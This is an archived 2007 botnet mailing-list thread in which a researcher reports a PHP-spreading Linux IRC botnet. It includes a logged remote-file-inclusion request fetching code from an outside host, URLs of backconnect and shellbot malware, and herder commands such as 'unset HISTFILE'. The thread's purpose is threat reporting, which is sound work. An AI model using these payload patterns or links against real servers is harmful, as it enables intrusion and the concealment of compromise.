To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- I mean, that if you have good reason you can try ask anybody from Shadowserver, but I hope it is very huge list !!
http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.BotCounts Btw: There is very fast increase state in zombie count for last two weeks, 800k hosts !! On Wed, Mar 21, 2007 at 02:05:51PM -0400, Adriel T. Desautels wrote: > List, > I already have access to a list of C&C servers, but there is a list that > I am missing. I'm very interested in getting a list of the IP addresses that > the bots themselves are connecting from. Ie: What systems specifically did > they infect? Is there a way to get such a list? > > > On 3/21/07 2:03 PM, "David Vorel" <[EMAIL PROTECTED]> wrote: > > > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > > ---------- > > > > Hi all, > > > > nice shot Bodik ;] I found different botnet on eu.undernet.org chan #vx8 > > it's > > linux > > zombie based botnet spreads throught various bugs in PHP. Undernet > > admins please take look on it. Description follows. Botnet herders are > > Denzel, xeQt, aslpls-. > > > > > > First attempt: > > > > 85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET > > /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 > > "-" "libwww-perl/5.79" > > > > We mirror all links included, engine for RFI source is not completed > > yet, so for this time I send row urls. > > > > http://nawader.org/modules/Top/kgb.c > > http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt > > - PHP shell which includes other links > > > > http://nawader.org/modules/Top/bc.txt > > http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt > > - Backconnect shell > > > > http://nawader.org/modules/Top/n.txt > > http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt > > - Shellbot I, connect to eu.undernet.org #vx8 > > > > http://nawader.org/modules/Top/teamrx > > http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt > > - Loader for n.txt and bc.txt run backconnect and send shell to > > 220.232.137.199 and 64.38.11.130 > > > > > > http://nawader.org/modules/Top/toyo.txt > > http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt > > - Shellbot II, connect to eu.undernet.org #vx8 > > > > > > > > All scripts are labelled "xeQt vS TeaMrx". > > > > Who on chan: > > > > http://www.honeynet.cz/trash/list > > > > After while on channel bot herders move bots to another chan. > > > > #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI > > #vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi. > > > > > > > > Here is list from uname -sr. > > > > http://www.honeynet.cz/trash/uname > > > > > > > > > > chat: > > > > <crop> > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould > >>> u > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :make shit > > << PRIVMSG #vx8 :i now that you are criminal > > << PRIVMSG #vx8 :but still on free ? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :$$ > > << PRIVMSG xeQt :^AVERSION^A > >>> :[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC > >>> v6.17 Khaled Mardam-Bey^A > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its my life > > << PRIVMSG #vx8 :jail is for free > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i know > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon > > << PRIVMSG #vx8 :y are waiting for ? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its full > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :a few months > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i > >>> goto wait > > </crop> > > > > <crop> > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch > >>> any of the servers > > << PRIVMSG #vx8 :when u installed your script throught bug in php that's > > touching too > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 ::))) > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i tould you > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its magic > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont connect to > >>> anything > > << PRIVMSG #vx8 :yes u did > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :no i didn't > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :all the bots do my > >>> job > > << PRIVMSG #vx8 :and that is ? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you know what mass > >>> spread is? > > << PRIVMSG #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI > > << PRIVMSG #vx8 :and what about this ? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :so? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :how you get this ip > >>> address from that? > > << PRIVMSG #vx8 :this command is better one.. > > << PRIVMSG #vx8 :<@xeQt> !x uname -sr > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x id > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33949(nucsaor) > >>> gid=33952(nucsaor) groups=33952(nucsaor) > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33(www-data) > >>> gid=33(www-data) groups=33(www-data) > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :like that? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 > >>> :uid=80(www) gid=80(www) groups=80(www) > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) > >>> gid=80(www) groups=80(www) > > << PRIVMSG #vx8 :yes, now you are in direct connect with these servers > > .. > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont think you > >>> have no clue man > > << PRIVMSG #vx8 :thats the point of abuse .. > > << PRIVMSG #vx8 :these servers are yours ? > > << PRIVMSG #vx8 :or not ? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i understand your > >>> pissed off, but this is useless > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call the cops, make > >>> them trace me... but its useless > > << PRIVMSG #vx8 :I think that all servers here are used to fraud .. > > << PRIVMSG #vx8 :i dont think so .. > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x unset HISTFILE > >>> HISTSAVE > > << PRIVMSG #vx8 :heh > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :o_0 > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont see how you > >>> get ip from that > > << PRIVMSG #vx8 :from what ? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac? > > << PRIVMSG #vx8 :? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :man > > << PRIVMSG #vx8 :what ? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :good luck hunting > >>> me > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :with feds > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its useless > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :for sure > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :but do it.. i dont > >>> say no but.. goood luck > > << PRIVMSG #vx8 :i'm not hunting you, thats work for authorities. > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :yes > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :goood > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i like a channelge > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :challenge > > << PRIVMSG #vx8 :so what for now ? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont need to > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :why wold i do that? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im the bitch, you > >>> the victum.. > > << PRIVMSG #vx8 :i'm not victim .. > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you hunt me > > << PRIVMSG #vx8 :others are victims .. > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :your right > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you a cop? > > << PRIVMSG #vx8 :yes > > << PRIVMSG #vx8 :;] > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :and? > >>> :[EMAIL PROTECTED] NICK :CopKiller > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :what you gonna do > >>> about it? > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call your friends, > >>> girlfriends.... > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont give a > >>> fuck > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :here i kick cops > > << PRIVMSG #vx8 :so kick me dude ;] > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :dont need to > > << PRIVMSG #vx8 :heh > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :come here and ill > >>> show you > > << PRIVMSG #vx8 :i'm here > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :in my hoood > >>> :[EMAIL PROTECTED] PRIVMSG #vx8 :not mirc > > </crop> > > > > Cheers.. > > > > David Vorel > > > > _______________________________________________ > > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > > All list and server information are public and available to law enforcement > > upon request. > > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > > -- > > Regards, > Adriel T. Desautels > Chief Technology Officer - Netragard, LLC > Office: 617-934-0269 || Mobile : 857-636-8882 > http://www.linkedin.com/pub/1/118/a45 > http://www.netragard.com > ------------------------- > "We make IT secure." > > _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
